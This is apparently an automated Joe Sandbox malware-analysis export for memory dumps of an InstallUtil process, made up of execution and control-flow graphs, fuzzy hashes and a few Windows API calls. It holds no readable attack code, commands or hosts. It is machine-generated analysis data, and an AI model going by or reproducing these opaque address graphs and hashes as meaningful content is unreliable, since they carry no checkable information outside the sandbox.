                                                              execution_graph 23148 5b3cbd0 23149 5b3cc38 CreateWindowExW 23148->23149 23151 5b3ccf4 23149->23151 23151->23151 23152 5b3a320 23154 5b3a451 23152->23154 23155 5b3a351 23152->23155 23153 5b3a35d 23155->23153 23162 5b3a598 23155->23162 23166 5b3a588 23155->23166 23156 5b3a39d 23170 5b3b898 23156->23170 23177 5b3b86c 23156->23177 23184 5b3b889 23156->23184 23191 5b3a5e8 23162->23191 23200 5b3a5d8 23162->23200 23163 5b3a5a2 23163->23156 23167 5b3a5a2 23166->23167 23168 5b3a5e8 2 API calls 23166->23168 23169 5b3a5d8 2 API calls 23166->23169 23167->23156 23168->23167 23169->23167 23171 5b3b8c3 23170->23171 23216 5b3bdd0 23171->23216 23220 5b3be00 23171->23220 23172 5b3b946 23173 5b3b972 23172->23173 23174 5b3951c GetModuleHandleW 23172->23174 23173->23173 23174->23173 23178 5b3b8ee 23177->23178 23182 5b3bdd0 GetModuleHandleW 23178->23182 23183 5b3be00 GetModuleHandleW 23178->23183 23179 5b3b946 23180 5b3951c GetModuleHandleW 23179->23180 23181 5b3b972 23179->23181 23180->23181 23182->23179 23183->23179 23185 5b3b898 23184->23185 23189 5b3bdd0 GetModuleHandleW 23185->23189 23190 5b3be00 GetModuleHandleW 23185->23190 23186 5b3b946 23187 5b3951c GetModuleHandleW 23186->23187 23188 5b3b972 23186->23188 23187->23188 23189->23186 23190->23186 23192 5b3a5f9 23191->23192 23195 5b3a61c 23191->23195 23209 5b3951c 23192->23209 23195->23163 23196 5b3a820 GetModuleHandleW 23198 5b3a84d 23196->23198 23197 5b3a614 23197->23195 23197->23196 23198->23163 23201 5b3a5dd 23200->23201 23202 5b3951c GetModuleHandleW 23201->23202 23204 5b3a61c 23201->23204 23203 5b3a604 23202->23203 23203->23204 23208 5b3a87f GetModuleHandleW 23203->23208 23204->23163 23205 5b3a820 GetModuleHandleW 23207 5b3a84d 23205->23207 23206 5b3a614 23206->23204 23206->23205 23207->23163 23208->23206 23211 5b3a7d8 GetModuleHandleW 23209->23211 23212 5b3a604 23211->23212 23212->23195 23213 5b3a87f 23212->23213 23214 5b3951c GetModuleHandleW 23213->23214 23215 5b3a894 23214->23215 23215->23197 23217 5b3bdd5 23216->23217 23218 5b3beae 23217->23218 23224 5b3c378 23217->23224 23221 5b3be2d 23220->23221 23222 5b3beae 23221->23222 23223 5b3c378 GetModuleHandleW 23221->23223 23223->23222 23225 5b3c38d 23224->23225 23226 5b3951c GetModuleHandleW 23225->23226 23227 5b3c3b1 23225->23227 23226->23227 23228 5b3951c GetModuleHandleW 23227->23228 23233 5b3c56d 23227->23233 23229 5b3c4f3 23228->23229 23230 5b3951c GetModuleHandleW 23229->23230 23229->23233 23231 5b3c541 23230->23231 23232 5b3951c GetModuleHandleW 23231->23232 23231->23233 23232->23233 23233->23218 23234 5b3f160 23235 5b3f17d 23234->23235 23236 5b3f1d2 23235->23236 23237 5b3f27c 23235->23237 23238 5b3f22a CallWindowProcW 23236->23238 23240 5b3f1d9 23236->23240 23241 5b3bfec 23237->23241 23238->23240 23242 5b3bff7 23241->23242 23244 5b3db39 23242->23244 23245 5b3c114 CallWindowProcW 23242->23245 23245->23244 23246 123d01c 23247 123d034 23246->23247 23248 123d08e 23247->23248 23253 5b3bfec CallWindowProcW 23247->23253 23254 5b3cd77 23247->23254 23258 5b3cdd8 23247->23258 23263 5b3cd88 23247->23263 23267 5b3dad8 23247->23267 23253->23248 23255 5b3cd85 23254->23255 23256 5b3bfec CallWindowProcW 23255->23256 23257 5b3cdcf 23256->23257 23257->23248 23259 5b3cde7 23258->23259 23262 5b3cd70 23258->23262 23259->23248 23260 5b3bfec CallWindowProcW 23261 5b3cdcf 23260->23261 23261->23248 23262->23260 23264 5b3cdae 23263->23264 23265 5b3bfec CallWindowProcW 23264->23265 23266 5b3cdcf 23265->23266 23266->23248 23268 5b3dae8 23267->23268 23270 5b3db39 23268->23270 23271 5b3c114 CallWindowProcW 23268->23271 23271->23270
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9b05168bf359175b66e3ab342b881f72fafef83f6c56af13f72a4c3531c49752
                                                              • Instruction ID: 574b00aacced6647050d29b2833f6223bb5685f4d74cf74a064e17e05525bffa
                                                              • Opcode Fuzzy Hash: 9b05168bf359175b66e3ab342b881f72fafef83f6c56af13f72a4c3531c49752
                                                              • Instruction Fuzzy Hash: DD53E831D10B1A8ADB11EF68C854AA9F7B1FF99300F15C79AE45877121EB70AAD4CF81
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 72aa79132e12324c22fb64d00fdfb21df520c2b58954c3476eeb87458378cda1
                                                              • Instruction ID: 5e1def1684a0e574785c8dab6603b9881edc77394924ea5d6f0ead8c310e8f9a
                                                              • Opcode Fuzzy Hash: 72aa79132e12324c22fb64d00fdfb21df520c2b58954c3476eeb87458378cda1
                                                              • Instruction Fuzzy Hash: 61333F31D10B1A8EDB11DF68C8846ADF7B1FF99300F15C79AE449A7251EB70AAC5CB81

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1116 12d4190-12d41f6 1118 12d41f8-12d4203 1116->1118 1119 12d4240-12d4242 1116->1119 1118->1119 1120 12d4205-12d4211 1118->1120 1121 12d4244-12d425d 1119->1121 1122 12d4234-12d423e 1120->1122 1123 12d4213-12d421d 1120->1123 1127 12d425f-12d426b 1121->1127 1128 12d42a9-12d42ab 1121->1128 1122->1121 1124 12d421f 1123->1124 1125 12d4221-12d4230 1123->1125 1124->1125 1125->1125 1129 12d4232 1125->1129 1127->1128 1130 12d426d-12d4279 1127->1130 1131 12d42ad-12d4305 1128->1131 1129->1122 1132 12d429c-12d42a7 1130->1132 1133 12d427b-12d4285 1130->1133 1140 12d434f-12d4351 1131->1140 1141 12d4307-12d4312 1131->1141 1132->1131 1134 12d4289-12d4298 1133->1134 1135 12d4287 1133->1135 1134->1134 1137 12d429a 1134->1137 1135->1134 1137->1132 1142 12d4353-12d436b 1140->1142 1141->1140 1143 12d4314-12d4320 1141->1143 1150 12d436d-12d4378 1142->1150 1151 12d43b5-12d43b7 1142->1151 1144 12d4343-12d434d 1143->1144 1145 12d4322-12d432c 1143->1145 1144->1142 1146 12d432e 1145->1146 1147 12d4330-12d433f 1145->1147 1146->1147 1147->1147 1149 12d4341 1147->1149 1149->1144 1150->1151 1153 12d437a-12d4386 1150->1153 1152 12d43b9-12d441e 1151->1152 1162 12d4427-12d4487 1152->1162 1163 12d4420-12d4426 1152->1163 1154 12d43a9-12d43b3 1153->1154 1155 12d4388-12d4392 1153->1155 1154->1152 1157 12d4394 1155->1157 1158 12d4396-12d43a5 1155->1158 1157->1158 1158->1158 1159 12d43a7 1158->1159 1159->1154 1170 12d4489-12d448d 1162->1170 1171 12d4497-12d449b 1162->1171 1163->1162 1170->1171 1172 12d448f 1170->1172 1173 12d449d-12d44a1 1171->1173 1174 12d44ab-12d44af 1171->1174 1172->1171 1173->1174 1175 12d44a3 1173->1175 1176 12d44bf-12d44c3 1174->1176 1177 12d44b1-12d44b5 1174->1177 1175->1174 1179 12d44c5-12d44c9 1176->1179 1180 12d44d3-12d44d7 1176->1180 1177->1176 1178 12d44b7-12d44ba call 12d0ab0 1177->1178 1178->1176 1179->1180 1181 12d44cb-12d44ce call 12d0ab0 1179->1181 1182 12d44d9-12d44dd 1180->1182 1183 12d44e7-12d44eb 1180->1183 1181->1180 1182->1183 1186 12d44df-12d44e2 call 12d0ab0 1182->1186 1187 12d44ed-12d44f1 1183->1187 1188 12d44fb-12d44ff 1183->1188 1186->1183 1187->1188 1190 12d44f3 1187->1190 1191 12d450f 1188->1191 1192 12d4501-12d4505 1188->1192 1190->1188 1194 12d4510 1191->1194 1192->1191 1193 12d4507 1192->1193 1193->1191 1194->1194
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V8m
                                                              • API String ID: 0-3962739738
                                                              • Opcode ID: 326824f0d7ae6b462cb3ca0205096affa1b141ea67be5113a23dc0d7ca65be7c
                                                              • Instruction ID: 4a1805ab43bd0f818c818359f5e862ae320514a028f0ce802101a2da8e097544
                                                              • Opcode Fuzzy Hash: 326824f0d7ae6b462cb3ca0205096affa1b141ea67be5113a23dc0d7ca65be7c
                                                              • Instruction Fuzzy Hash: F1B16C70E1024ACFDB10DFA9D8857EEBBF2EF88314F148129D915E7694EB749885CB81

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1274 12d3e48-12d3eae 1276 12d3ef8-12d3efa 1274->1276 1277 12d3eb0-12d3ebb 1274->1277 1279 12d3efc-12d3f54 1276->1279 1277->1276 1278 12d3ebd-12d3ec9 1277->1278 1280 12d3eec-12d3ef6 1278->1280 1281 12d3ecb-12d3ed5 1278->1281 1288 12d3f9e-12d3fa0 1279->1288 1289 12d3f56-12d3f61 1279->1289 1280->1279 1283 12d3ed9-12d3ee8 1281->1283 1284 12d3ed7 1281->1284 1283->1283 1285 12d3eea 1283->1285 1284->1283 1285->1280 1290 12d3fa2-12d3fba 1288->1290 1289->1288 1291 12d3f63-12d3f6f 1289->1291 1297 12d3fbc-12d3fc7 1290->1297 1298 12d4004-12d4006 1290->1298 1292 12d3f71-12d3f7b 1291->1292 1293 12d3f92-12d3f9c 1291->1293 1295 12d3f7d 1292->1295 1296 12d3f7f-12d3f8e 1292->1296 1293->1290 1295->1296 1296->1296 1299 12d3f90 1296->1299 1297->1298 1301 12d3fc9-12d3fd5 1297->1301 1300 12d4008-12d4056 1298->1300 1299->1293 1309 12d405c-12d406a 1300->1309 1302 12d3ff8-12d4002 1301->1302 1303 12d3fd7-12d3fe1 1301->1303 1302->1300 1304 12d3fe5-12d3ff4 1303->1304 1305 12d3fe3 1303->1305 1304->1304 1307 12d3ff6 1304->1307 1305->1304 1307->1302 1310 12d406c-12d4072 1309->1310 1311 12d4073-12d40d3 1309->1311 1310->1311 1318 12d40d5-12d40d9 1311->1318 1319 12d40e3-12d40e7 1311->1319 1318->1319 1322 12d40db 1318->1322 1320 12d40e9-12d40ed 1319->1320 1321 12d40f7-12d40fb 1319->1321 1320->1321 1323 12d40ef-12d40f2 call 12d0ab0 1320->1323 1324 12d40fd-12d4101 1321->1324 1325 12d410b-12d410f 1321->1325 1322->1319 1323->1321 1324->1325 1327 12d4103-12d4106 call 12d0ab0 1324->1327 1328 12d411f-12d4123 1325->1328 1329 12d4111-12d4115 1325->1329 1327->1325 1332 12d4125-12d4129 1328->1332 1333 12d4133-12d4137 1328->1333 1329->1328 1331 12d4117-12d411a call 12d0ab0 1329->1331 1331->1328 1332->1333 1337 12d412b 1332->1337 1334 12d4139-12d413d 1333->1334 1335 12d4147 1333->1335 1334->1335 1338 12d413f 1334->1338 1339 12d4148 1335->1339 1337->1333 1338->1335 1339->1339
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V8m
                                                              • API String ID: 0-3962739738
                                                              • Opcode ID: 706ac5a141289e030055b649c2f7c9b11e07a9b710431b6aaac840dfd35fa715
                                                              • Instruction ID: 8b97ce142bf17de3dec7568469c68328954b4c23459a64e5d6e22b06dfbfc8ff
                                                              • Opcode Fuzzy Hash: 706ac5a141289e030055b649c2f7c9b11e07a9b710431b6aaac840dfd35fa715
                                                              • Instruction Fuzzy Hash: DA916DB0E1024ADFDF14DFA9C88579EBBF2BF88314F148129E515E7294DB749845CB82
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d101b99178ff86c1b01ad7e45353dc383c071113a51dcfa2d5ef84a42468b3a0
                                                              • Instruction ID: e1cf0c73fa4352bc771c5f2cc3a1c6ceb83e6702822106e57b85bb3aed5d3648
                                                              • Opcode Fuzzy Hash: d101b99178ff86c1b01ad7e45353dc383c071113a51dcfa2d5ef84a42468b3a0
                                                              • Instruction Fuzzy Hash: 28B1BD70E1034ACFDB10DFA9D8857AEBBF2AF88314F148129D915E7794EB749845CB81

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 921 5b3a5e8-5b3a5f7 922 5b3a623-5b3a627 921->922 923 5b3a5f9-5b3a606 call 5b3951c 921->923 924 5b3a63b-5b3a67c 922->924 925 5b3a629-5b3a633 922->925 928 5b3a608-5b3a616 call 5b3a87f 923->928 929 5b3a61c 923->929 932 5b3a689-5b3a697 924->932 933 5b3a67e-5b3a686 924->933 925->924 928->929 939 5b3a758-5b3a818 928->939 929->922 935 5b3a6bb-5b3a6bd 932->935 936 5b3a699-5b3a69e 932->936 933->932 940 5b3a6c0-5b3a6c7 935->940 937 5b3a6a0-5b3a6a7 call 5b39528 936->937 938 5b3a6a9 936->938 942 5b3a6ab-5b3a6b9 937->942 938->942 972 5b3a820-5b3a84b GetModuleHandleW 939->972 973 5b3a81a-5b3a81d 939->973 943 5b3a6d4-5b3a6db 940->943 944 5b3a6c9-5b3a6d1 940->944 942->940 946 5b3a6e8-5b3a6f1 call 5b32d4c 943->946 947 5b3a6dd-5b3a6e5 943->947 944->943 952 5b3a6f3-5b3a6fb 946->952 953 5b3a6fe-5b3a703 946->953 947->946 952->953 955 5b3a721-5b3a72e 953->955 956 5b3a705-5b3a70c 953->956 962 5b3a751-5b3a757 955->962 963 5b3a730-5b3a74e 955->963 956->955 957 5b3a70e-5b3a71e call 5b39398 call 5b39538 956->957 957->955 963->962 974 5b3a854-5b3a868 972->974 975 5b3a84d-5b3a853 972->975 973->972 975->974
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1577580151.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_5b30000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 1f587f8dec6e6f2eeec2e8b3de3744a74bfaed19f23051094fefca10ef63d0b5
                                                              • Instruction ID: 1e731fef3a94fe408b92f9200410336ee954f89351c4c973d0cc04bb752afc6c
                                                              • Opcode Fuzzy Hash: 1f587f8dec6e6f2eeec2e8b3de3744a74bfaed19f23051094fefca10ef63d0b5
                                                              • Instruction Fuzzy Hash: B8814870A00B058FD724DF6AD05576ABBF6FF88200F208A6DD48AE7A40D775F845CB90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 978 5b3cbc4-5b3cc36 980 5b3cc41-5b3cc48 978->980 981 5b3cc38-5b3cc3e 978->981 982 5b3cc53-5b3cc8b 980->982 983 5b3cc4a-5b3cc50 980->983 981->980 984 5b3cc93-5b3ccf2 CreateWindowExW 982->984 983->982 985 5b3ccf4-5b3ccfa 984->985 986 5b3ccfb-5b3cd33 984->986 985->986 990 5b3cd40 986->990 991 5b3cd35-5b3cd38 986->991 992 5b3cd41 990->992 991->990 992->992
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05B3CCE2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1577580151.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_5b30000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 60ee5bc696bee066e1d0466dfb53134bed3e5fcdeed390cae61d28102da51b03
                                                              • Instruction ID: 1d084a33ae950f5e493b9de1040ccb61012b8299e4ea213c33068937211e9015
                                                              • Opcode Fuzzy Hash: 60ee5bc696bee066e1d0466dfb53134bed3e5fcdeed390cae61d28102da51b03
                                                              • Instruction Fuzzy Hash: 6D51B0B1D003499FDB14CF9AD885ADEBFB5BF48310F64812AE419BB250D771A841CF90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 993 5b3cbd0-5b3cc36 994 5b3cc41-5b3cc48 993->994 995 5b3cc38-5b3cc3e 993->995 996 5b3cc53-5b3ccf2 CreateWindowExW 994->996 997 5b3cc4a-5b3cc50 994->997 995->994 999 5b3ccf4-5b3ccfa 996->999 1000 5b3ccfb-5b3cd33 996->1000 997->996 999->1000 1004 5b3cd40 1000->1004 1005 5b3cd35-5b3cd38 1000->1005 1006 5b3cd41 1004->1006 1005->1004 1006->1006
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05B3CCE2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1577580151.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_5b30000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 706048899d0f9a79dfd408178c7773e54294fa5afce6ecf07ae9a52019e7f350
                                                              • Instruction ID: eed7282e17a5eb3ef80441fe9a1aa03a65872f18ab32071c89eca433217e0f1f
                                                              • Opcode Fuzzy Hash: 706048899d0f9a79dfd408178c7773e54294fa5afce6ecf07ae9a52019e7f350
                                                              • Instruction Fuzzy Hash: C641ACB1D002099FDB14CFAAC885ADEBFB5BF48310F24812AE819BB250D771A845CF90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1007 5b3c114-5b3f1cc 1010 5b3f1d2-5b3f1d7 1007->1010 1011 5b3f27c-5b3f29c call 5b3bfec 1007->1011 1012 5b3f22a-5b3f262 CallWindowProcW 1010->1012 1013 5b3f1d9-5b3f210 1010->1013 1018 5b3f29f-5b3f2ac 1011->1018 1015 5b3f264-5b3f26a 1012->1015 1016 5b3f26b-5b3f27a 1012->1016 1020 5b3f212-5b3f218 1013->1020 1021 5b3f219-5b3f228 1013->1021 1015->1016 1016->1018 1020->1021 1021->1018
                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05B3F251
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1577580151.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_5b30000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
                                                              • API String ID: 2714655100-0
                                                              • Opcode ID: ec302936e76ffb7207e1835d308a9cf98d35729a7357587046658c3ee032d711
                                                              • Instruction ID: b8e83b7b87837dc2afce3327f9d7ebcc2ea354375b778c22a4ce06e093878e3a
                                                              • Opcode Fuzzy Hash: ec302936e76ffb7207e1835d308a9cf98d35729a7357587046658c3ee032d711
                                                              • Instruction Fuzzy Hash: 7A411EB9900709DFDB14CF95C849BAABBF5FB88314F148899E519A7361D374A841CFA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1024 5b3951c-5b3a818 1026 5b3a820-5b3a84b GetModuleHandleW 1024->1026 1027 5b3a81a-5b3a81d 1024->1027 1028 5b3a854-5b3a868 1026->1028 1029 5b3a84d-5b3a853 1026->1029 1027->1026 1029->1028
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,05B3A604), ref: 05B3A83E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1577580151.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_5b30000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 0c440b87ca59680f09ee2a3875d82545ebb1fc6eb7d211c623e626bf4d2580bd
                                                              • Instruction ID: d39bcccc57fb47d48ea323837120d4a204ec3ac65ecfa4166e0bf3250fc48a34
                                                              • Opcode Fuzzy Hash: 0c440b87ca59680f09ee2a3875d82545ebb1fc6eb7d211c623e626bf4d2580bd
                                                              • Instruction Fuzzy Hash: D6113FB6C00249CFDB10CF9AC444BAEFBF4EB88220F20846AD859B7600D378A505CFA1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1195 12d418f-12d41f6 1197 12d41f8-12d4203 1195->1197 1198 12d4240-12d4242 1195->1198 1197->1198 1199 12d4205-12d4211 1197->1199 1200 12d4244-12d425d 1198->1200 1201 12d4234-12d423e 1199->1201 1202 12d4213-12d421d 1199->1202 1206 12d425f-12d426b 1200->1206 1207 12d42a9-12d42ab 1200->1207 1201->1200 1203 12d421f 1202->1203 1204 12d4221-12d4230 1202->1204 1203->1204 1204->1204 1208 12d4232 1204->1208 1206->1207 1209 12d426d-12d4279 1206->1209 1210 12d42ad-12d4305 1207->1210 1208->1201 1211 12d429c-12d42a7 1209->1211 1212 12d427b-12d4285 1209->1212 1219 12d434f-12d4351 1210->1219 1220 12d4307-12d4312 1210->1220 1211->1210 1213 12d4289-12d4298 1212->1213 1214 12d4287 1212->1214 1213->1213 1216 12d429a 1213->1216 1214->1213 1216->1211 1221 12d4353-12d436b 1219->1221 1220->1219 1222 12d4314-12d4320 1220->1222 1229 12d436d-12d4378 1221->1229 1230 12d43b5-12d43b7 1221->1230 1223 12d4343-12d434d 1222->1223 1224 12d4322-12d432c 1222->1224 1223->1221 1225 12d432e 1224->1225 1226 12d4330-12d433f 1224->1226 1225->1226 1226->1226 1228 12d4341 1226->1228 1228->1223 1229->1230 1232 12d437a-12d4386 1229->1232 1231 12d43b9-12d441e 1230->1231 1241 12d4427-12d4487 1231->1241 1242 12d4420-12d4426 1231->1242 1233 12d43a9-12d43b3 1232->1233 1234 12d4388-12d4392 1232->1234 1233->1231 1236 12d4394 1234->1236 1237 12d4396-12d43a5 1234->1237 1236->1237 1237->1237 1238 12d43a7 1237->1238 1238->1233 1249 12d4489-12d448d 1241->1249 1250 12d4497-12d449b 1241->1250 1242->1241 1249->1250 1251 12d448f 1249->1251 1252 12d449d-12d44a1 1250->1252 1253 12d44ab-12d44af 1250->1253 1251->1250 1252->1253 1254 12d44a3 1252->1254 1255 12d44bf-12d44c3 1253->1255 1256 12d44b1-12d44b5 1253->1256 1254->1253 1258 12d44c5-12d44c9 1255->1258 1259 12d44d3-12d44d7 1255->1259 1256->1255 1257 12d44b7-12d44ba call 12d0ab0 1256->1257 1257->1255 1258->1259 1260 12d44cb-12d44ce call 12d0ab0 1258->1260 1261 12d44d9-12d44dd 1259->1261 1262 12d44e7-12d44eb 1259->1262 1260->1259 1261->1262 1265 12d44df-12d44e2 call 12d0ab0 1261->1265 1266 12d44ed-12d44f1 1262->1266 1267 12d44fb-12d44ff 1262->1267 1265->1262 1266->1267 1269 12d44f3 1266->1269 1270 12d450f 1267->1270 1271 12d4501-12d4505 1267->1271 1269->1267 1273 12d4510 1270->1273 1271->1270 1272 12d4507 1271->1272 1272->1270 1273->1273
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V8m
                                                              • API String ID: 0-3962739738
                                                              • Opcode ID: 48b954d9cfaa8256bb62ba04412c370fb3047c4ee0679a0e256403acf3a42e2e
                                                              • Instruction ID: 43888f128995967789eff1760fc088bd7cb089ca4eaf6b9612795854b1d2e4c1
                                                              • Opcode Fuzzy Hash: 48b954d9cfaa8256bb62ba04412c370fb3047c4ee0679a0e256403acf3a42e2e
                                                              • Instruction Fuzzy Hash: 9EB14C70E1024ACFDB10DFA9D8857EEBBF1EF88314F248129D915E7694EB749885CB81

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1340 12d3e3c-12d3eae 1342 12d3ef8-12d3efa 1340->1342 1343 12d3eb0-12d3ebb 1340->1343 1345 12d3efc-12d3f54 1342->1345 1343->1342 1344 12d3ebd-12d3ec9 1343->1344 1346 12d3eec-12d3ef6 1344->1346 1347 12d3ecb-12d3ed5 1344->1347 1354 12d3f9e-12d3fa0 1345->1354 1355 12d3f56-12d3f61 1345->1355 1346->1345 1349 12d3ed9-12d3ee8 1347->1349 1350 12d3ed7 1347->1350 1349->1349 1351 12d3eea 1349->1351 1350->1349 1351->1346 1356 12d3fa2-12d3fba 1354->1356 1355->1354 1357 12d3f63-12d3f6f 1355->1357 1363 12d3fbc-12d3fc7 1356->1363 1364 12d4004-12d4006 1356->1364 1358 12d3f71-12d3f7b 1357->1358 1359 12d3f92-12d3f9c 1357->1359 1361 12d3f7d 1358->1361 1362 12d3f7f-12d3f8e 1358->1362 1359->1356 1361->1362 1362->1362 1365 12d3f90 1362->1365 1363->1364 1367 12d3fc9-12d3fd5 1363->1367 1366 12d4008-12d401a 1364->1366 1365->1359 1374 12d4021-12d4056 1366->1374 1368 12d3ff8-12d4002 1367->1368 1369 12d3fd7-12d3fe1 1367->1369 1368->1366 1370 12d3fe5-12d3ff4 1369->1370 1371 12d3fe3 1369->1371 1370->1370 1373 12d3ff6 1370->1373 1371->1370 1373->1368 1375 12d405c-12d406a 1374->1375 1376 12d406c-12d4072 1375->1376 1377 12d4073-12d40d3 1375->1377 1376->1377 1384 12d40d5-12d40d9 1377->1384 1385 12d40e3-12d40e7 1377->1385 1384->1385 1388 12d40db 1384->1388 1386 12d40e9-12d40ed 1385->1386 1387 12d40f7-12d40fb 1385->1387 1386->1387 1389 12d40ef-12d40f2 call 12d0ab0 1386->1389 1390 12d40fd-12d4101 1387->1390 1391 12d410b-12d410f 1387->1391 1388->1385 1389->1387 1390->1391 1393 12d4103-12d4106 call 12d0ab0 1390->1393 1394 12d411f-12d4123 1391->1394 1395 12d4111-12d4115 1391->1395 1393->1391 1398 12d4125-12d4129 1394->1398 1399 12d4133-12d4137 1394->1399 1395->1394 1397 12d4117-12d411a call 12d0ab0 1395->1397 1397->1394 1398->1399 1403 12d412b 1398->1403 1400 12d4139-12d413d 1399->1400 1401 12d4147 1399->1401 1400->1401 1404 12d413f 1400->1404 1405 12d4148 1401->1405 1403->1399 1404->1401 1405->1405
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1569481493.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_12d0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \V8m
                                                              • API String ID: 0-3962739738
                                                              • Opcode ID: 868ec2fbc6633a545394ff00700b528bc2e77e6600a7f43a022ea4659491dee0
                                                              • Instruction ID: 671aaf166dad652c3b0ba802aca32e7821932c9b871bcd7f3ffb92463626a4fc
                                                              • Opcode Fuzzy Hash: 868ec2fbc6633a545394ff00700b528bc2e77e6600a7f43a022ea4659491dee0
                                                              • Instruction Fuzzy Hash: 87917AB0E1024ACFDF14DFA9C8857EEBBF1BF88314F248129E505A7294DB749845CB82

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
